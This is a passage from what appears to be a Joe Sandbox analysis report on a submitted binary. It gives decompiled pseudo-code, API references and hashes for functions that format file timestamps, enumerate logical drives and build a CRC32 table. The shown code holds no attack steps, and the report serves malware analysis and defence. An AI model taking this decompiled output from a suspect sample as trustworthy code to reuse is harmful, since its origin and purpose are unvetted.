					_a4 = _t258;
				}
				_t259 = 0xa;
				_t201 = _t259;
				_t262[3] = _t258 % _t201 + 0x30;
				_t148 = _a4 / _t201;
				_a4 = _t148;
				_t262[2] = _t148 % _t201 + 0x30;
				_t151 = _a4 / _t201;
				_a4 = _t151;
				_t262[1] = _t151 % _t201 + 0x30;
				 *_t262 = _a4 / _t201 + 0x30;
				_t263 =  &(_t262[4]);
				asm("cdq");
				 *_t263 = 0x2d;
				_t264 =  &(_t263[3]);
				 *((char*)(_t264 - 2)) = (_v36.wMonth & 0x0000ffff) / _t201 + 0x30;
				asm("cdq");
				 *((char*)(_t264 - 1)) = (_v36.wMonth & 0x0000ffff) % _t201 + 0x30;
				 *_t264 = 0x2d;
				asm("cdq");
				_t265 =  &(_t264[3]);
				 *((char*)(_t265 - 2)) = (_v36.wDay & 0x0000ffff) / _t201 + 0x30;
				asm("cdq");
				 *((char*)(_t265 - 1)) = (_v36.wDay & 0x0000ffff) % _t201 + 0x30;
				if(_a8 <= 0xfffffffd) {
					L15:
					 *_t265 =  *_t265 & 0x00000000;
					return 1;
				} else {
					asm("cdq");
					 *_t265 = 0x20;
					_t266 =  &(_t265[3]);
					 *((char*)(_t266 - 2)) = (_v36.wHour & 0x0000ffff) / _t201 + 0x30;
					asm("cdq");
					 *((char*)(_t266 - 1)) = (_v36.wHour & 0x0000ffff) % _t201 + 0x30;
					 *_t266 = 0x3a;
					asm("cdq");
					_t265 =  &(_t266[3]);
					 *((char*)(_t265 - 2)) = (_v36.wMinute & 0x0000ffff) / _t201 + 0x30;
					asm("cdq");
					 *((char*)(_t265 - 1)) = (_v36.wMinute & 0x0000ffff) % _t201 + 0x30;
					if(_a8 < 0) {
						goto L15;
					}
					asm("cdq");
					 *_t265 = 0x3a;
					_t265 =  &(_t265[3]);
					 *((char*)(_t265 - 2)) = (_v36.wSecond & 0x0000ffff) / _t201 + 0x30;
					asm("cdq");
					_t242 = (_v36.wSecond & 0x0000ffff) % _t201 + 0x30;
					 *((char*)(_t265 - 1)) = (_v36.wSecond & 0x0000ffff) % _t201 + 0x30;
					if(_a8 <= 0) {
						goto L15;
					}
					 *_t265 = 0x2e;
					_t267 =  &(_t265[1]);
					_v8 = 7;
					_t183 = E0041F4B0(_v20.dwHighDateTime, 0, 0, 1);
					asm("adc edx, ebx");
					_a4 = E0041F3F0(_t183 + _v20.dwLowDateTime, _t242, 0x989680, 0);
					_t210 = 7;
					do {
						_t204 = _t259;
						_t210 = _t210 - 1;
						 *((char*)(_t210 + _t267)) = _a4 % _t204 + 0x30;
						_a4 = _a4 / _t204;
					} while (_t210 != 0);
					_t211 = _a8;
					if(_t211 < 7) {
						_v8 = _t211;
					}
					_t265 =  &(_t267[_v8]);
					if(_t211 >= 8) {
						 *_t265 = _v12 / _t259 + 0x30;
						_t265 =  &(_t265[1]);
						if(_t211 >= 9) {
							 *_t265 = _v12 % _t259 + 0x30;
							_t265 =  &(_t265[1]);
						}
					}
					goto L15;
				}
			}






















                                                                                                    0x003b943d
                                                                                                    0x003b9443
                                                                                                    0x003b9446
                                                                                                    0x003b9453
                                                                                                    0x00000000
                                                                                                    0x003b9467
                                                                                                    0x003b9470
                                                                                                    0x003b947a
                                                                                                    0x003b947f
                                                                                                    0x003b9490
                                                                                                    0x003b9496
                                                                                                    0x003b9499
                                                                                                    0x003b949b
                                                                                                    0x003b949b
                                                                                                    0x003b94a2
                                                                                                    0x003b94a5
                                                                                                    0x003b94ae
                                                                                                    0x003b94b3
                                                                                                    0x003b94b7
                                                                                                    0x003b94c1
                                                                                                    0x003b94c6
                                                                                                    0x003b94ca
                                                                                                    0x003b94d4
                                                                                                    0x003b94dd
                                                                                                    0x003b94df
                                                                                                    0x003b94e6
                                                                                                    0x003b94e9
                                                                                                    0x003b94ec
                                                                                                    0x003b94f1
                                                                                                    0x003b94f8
                                                                                                    0x003b9501
                                                                                                    0x003b9504
                                                                                                    0x003b9507
                                                                                                    0x003b950a
                                                                                                    0x003b950f
                                                                                                    0x003b9516
                                                                                                    0x003b951f
                                                                                                    0x003b9522
                                                                                                    0x003b961b
                                                                                                    0x003b961b
                                                                                                    0x00000000
                                                                                                    0x003b9528
                                                                                                    0x003b952c
                                                                                                    0x003b952f
                                                                                                    0x003b9532
                                                                                                    0x003b9537
                                                                                                    0x003b953e
                                                                                                    0x003b9547
                                                                                                    0x003b954a
                                                                                                    0x003b954d
                                                                                                    0x003b9550
                                                                                                    0x003b9555
                                                                                                    0x003b955c
                                                                                                    0x003b9565
                                                                                                    0x003b9568
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b9572
                                                                                                    0x003b9575
                                                                                                    0x003b9578
                                                                                                    0x003b957d
                                                                                                    0x003b9584
                                                                                                    0x003b9589
                                                                                                    0x003b958e
                                                                                                    0x003b9591
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b959b
                                                                                                    0x003b95a1
                                                                                                    0x003b95a2
                                                                                                    0x003b95a9
                                                                                                    0x003b95b6
                                                                                                    0x003b95c4
                                                                                                    0x003b95c9
                                                                                                    0x003b95ca
                                                                                                    0x003b95cf
                                                                                                    0x003b95d1
                                                                                                    0x003b95da
                                                                                                    0x003b95e3
                                                                                                    0x003b95e3
                                                                                                    0x003b95e8
                                                                                                    0x003b95ee
                                                                                                    0x003b95f0
                                                                                                    0x003b95f0
                                                                                                    0x003b95f3
                                                                                                    0x003b95f9
                                                                                                    0x003b9606
                                                                                                    0x003b9608
                                                                                                    0x003b960c
                                                                                                    0x003b9618
                                                                                                    0x003b961a
                                                                                                    0x003b961a
                                                                                                    0x003b960c
                                                                                                    0x00000000
                                                                                                    0x003b95f9

                                                                                                    APIs
                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,00000000,?,00000000,?,00000000,003E6C32,00000000,0043A5B0,00000000,00000000), ref: 003B944B
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 003B945D
                                                                                                    • __aullrem.LIBCMT ref: 003B95BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$File$LocalSystem__aullrem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417234408-0
                                                                                                    • Opcode ID: 765bfc450e0f0923c3806ec16de6578b1915dfeb682a30f737fe76e97bfdbf8f
                                                                                                    • Instruction ID: 5a7683c7ab6c2143387384a872db2b4a097a6dbafb14d03f355dfca4986daa4d
                                                                                                    • Opcode Fuzzy Hash: 765bfc450e0f0923c3806ec16de6578b1915dfeb682a30f737fe76e97bfdbf8f
                                                                                                    • Instruction Fuzzy Hash: AC51D671A042559BD711CF6AC4C03EEFBE6EF79214F24C41EE98897242D27A8D9BC760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B716C Relevance: 4.6, APIs: 3, Instructions: 88COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 81%
                                                                                                    			E003B716C(intOrPtr __ecx, void* __eflags) {
				signed int _t31;
				long _t32;
				intOrPtr _t37;
				long _t47;
				long _t49;
				intOrPtr _t50;
				long _t65;
				WCHAR* _t68;
				void* _t69;

				E0041F1B0(E00423020, _t69);
				 *((intOrPtr*)(_t69 - 0x10)) = __ecx;
				E003D6B24(__ecx);
				_t47 = GetLogicalDriveStringsW(0, 0);
				 *(_t69 - 0x18) = _t47;
				if(_t47 == 0) {
					L13:
					_t31 = 0;
				} else {
					_t32 = 0x7fffffff;
					if(_t47 <= 0x7fffffff) {
						_t32 = _t47;
					}
					_push(_t32 + _t32);
					_t68 = E003B1E0C();
					 *(_t69 - 0x20) = _t68;
					 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
					_t49 = GetLogicalDriveStringsW(_t47, _t68);
					_t65 = 0;
					 *((intOrPtr*)(_t69 - 0x14)) = _t49;
					if(_t49 == 0 || _t49 >  *(_t69 - 0x18)) {
						E003B1E40(_t35, _t68);
						goto L13;
					} else {
						_t37 = E003B2D47(_t69 - 0x2c);
						 *(_t69 - 4) = 1;
						 *(_t69 - 0x18) = 0;
						if(_t49 > 0) {
							_t37 = 0;
							_t50 = 2;
							do {
								if( *((short*)(_t68 + _t50 - 2)) == 0) {
									E003B2ECB(_t69 - 0x2c, _t37 + _t68);
									_t15 = _t65 + 1; // 0x1
									 *(_t69 - 0x18) = _t15;
									 *((intOrPtr*)(_t69 - 0x1c)) = _t50;
									E003EF23F( *((intOrPtr*)(_t69 - 0x10)));
									_push(_t69 - 0x2c);
									E003B1524( *((intOrPtr*)(_t69 - 0x10)));
									_t37 = _t50;
								}
								_t65 = _t65 + 1;
								_t50 = _t50 + 2;
							} while (_t65 <  *((intOrPtr*)(_t69 - 0x14)));
							_t49 =  *((intOrPtr*)(_t69 - 0x14));
						}
						_t31 = E003B1E40(E003B1E40(_t37,  *((intOrPtr*)(_t69 - 0x2c))), _t68) & 0xffffff00 |  *(_t69 - 0x18) == _t49;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return _t31;
			}












                                                                                                    0x003b7171
                                                                                                    0x003b717c
                                                                                                    0x003b717f
                                                                                                    0x003b7190
                                                                                                    0x003b7194
                                                                                                    0x003b7197
                                                                                                    0x003b7242
                                                                                                    0x003b7242
                                                                                                    0x003b719d
                                                                                                    0x003b719d
                                                                                                    0x003b71a4
                                                                                                    0x003b71a6
                                                                                                    0x003b71a6
                                                                                                    0x003b71aa
                                                                                                    0x003b71b0
                                                                                                    0x003b71b3
                                                                                                    0x003b71b6
                                                                                                    0x003b71be
                                                                                                    0x003b71c0
                                                                                                    0x003b71c4
                                                                                                    0x003b71c7
                                                                                                    0x003b723c
                                                                                                    0x00000000
                                                                                                    0x003b71ce
                                                                                                    0x003b71d1
                                                                                                    0x003b71d8
                                                                                                    0x003b71dc
                                                                                                    0x003b71df
                                                                                                    0x003b71e3
                                                                                                    0x003b71e5
                                                                                                    0x003b71e6
                                                                                                    0x003b71ec
                                                                                                    0x003b71f4
                                                                                                    0x003b71fc
                                                                                                    0x003b71ff
                                                                                                    0x003b7202
                                                                                                    0x003b7205
                                                                                                    0x003b7210
                                                                                                    0x003b7211
                                                                                                    0x003b7216
                                                                                                    0x003b7216
                                                                                                    0x003b7218
                                                                                                    0x003b721a
                                                                                                    0x003b721b
                                                                                                    0x003b7220
                                                                                                    0x003b7220
                                                                                                    0x003b7236
                                                                                                    0x003b7236
                                                                                                    0x003b71c7
                                                                                                    0x003b724a
                                                                                                    0x003b7252

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B7171
                                                                                                    • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000050,?,00000000), ref: 003B718E
                                                                                                    • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,00000000), ref: 003B71BC
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DriveLogicalStrings$H_prologfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 396970233-0
                                                                                                    • Opcode ID: 884342283dfb02015ac9a0ae2a31eac3c050c9148889e863abe4f333f3499c5c
                                                                                                    • Instruction ID: 020619dd470f76a195879d61a6a5bd08006120b3d3f8f64de5150e70ed4d1f91
                                                                                                    • Opcode Fuzzy Hash: 884342283dfb02015ac9a0ae2a31eac3c050c9148889e863abe4f333f3499c5c
                                                                                                    • Instruction Fuzzy Hash: F921FB72E042099BDF11EFE5D8C26EEF7B8EF84318F10442AE211B7581D7749A0487A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B1572 Relevance: 3.8, Strings: 3, Instructions: 91COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B1572() {
				void* _t43;
				unsigned int _t82;
				void* _t83;

				_t82 = 0;
				do {
					 *(0x43ea60 + _t82 * 4) =  ~(( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t82 & 0x00000001) & 0xedb88320 ^ _t82 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( 